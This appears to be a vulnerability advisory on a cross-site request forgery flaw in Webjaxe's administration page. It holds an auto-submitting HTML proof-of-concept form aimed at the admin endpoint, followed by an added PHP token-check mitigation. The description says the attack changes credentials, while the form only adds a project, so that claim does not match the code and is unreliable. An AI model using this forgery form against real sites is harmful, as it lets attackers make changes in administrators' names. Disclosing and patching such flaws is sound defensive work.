High-Tech Bridge SA Security Research Lab has discovered a vulnerability in Webjaxe, which could be exploited to perform cross-site request forgery attacks.
- Cross-site request forgery (CSRF) in Webjaxe
The vulnerability exists due to insufficient validation of the request origin in php/partie_administrateur/administration.php. A remote attacker can create a specially crafted link, trick a logged-in administrator into following that link, and modify the administrator's credentials.
Exploitation example:
<form action="http://[host]/php/partie_administrateur/administration.php" method="post" name="main" id="main">
<input type="hidden" name="action" value="ajouter_projet">
<input type="hidden" name="titre_projet" value="123123">
<input type="hidden" name="ajouter" value="Add">
<input type="hidden" name="submit" value="OK">
<input type="submit" id="btn">
</form>
<script>
document.getElementById('btn').click();
</script>
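Mitigation example (added here, not Webjaxe's own code or the vendor's patch): a session-bound token check that could be included at the top of php/partie_administrateur/administration.php, so that a cross-site POST like the one above, which carries no token, is refused. The function names csrf_token(), csrf_field() and csrf_check() and the field name csrf_token are assumptions.

```php
<?php
// Added example: hypothetical CSRF guard, not Webjaxe's own code.
// csrf_token(), csrf_field() and csrf_check() are assumed names.
session_start();

// Return the per-session token, creating it on first use.
function csrf_token(): string {
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// Hidden field to emit inside every administration form.
function csrf_field(): string {
    return '<input type="hidden" name="csrf_token" value="'
        . htmlspecialchars(csrf_token(), ENT_QUOTES, 'UTF-8') . '">';
}

// True only if the request carries the session's token and, when the
// browser sent an Origin header, that origin is this host.
function csrf_check(array $post, array $server, array $session): bool {
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === ''
        || !hash_equals($expected, $supplied)) {
        return false;
    }
    if (isset($server['HTTP_ORIGIN'])) {
        $parts = parse_url($server['HTTP_ORIGIN']);
        if (!is_array($parts) || empty($parts['host'])) {
            return false; // covers "Origin: null" and malformed values
        }
        $origin = $parts['host'] . (isset($parts['port']) ? ':' . $parts['port'] : '');
        if (strcasecmp($origin, $server['HTTP_HOST'] ?? '') !== 0) {
            return false;
        }
    }
    return true;
}

// Reject state-changing requests before any "action" is dispatched.
if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST'
    && !csrf_check($_POST, $_SERVER, $_SESSION)) {
    http_response_code(403);
    exit('Invalid or missing CSRF token');
}
```

Each legitimate administration form would then emit csrf_field() inside its form element; the token comparison uses hash_equals() so it runs in constant time.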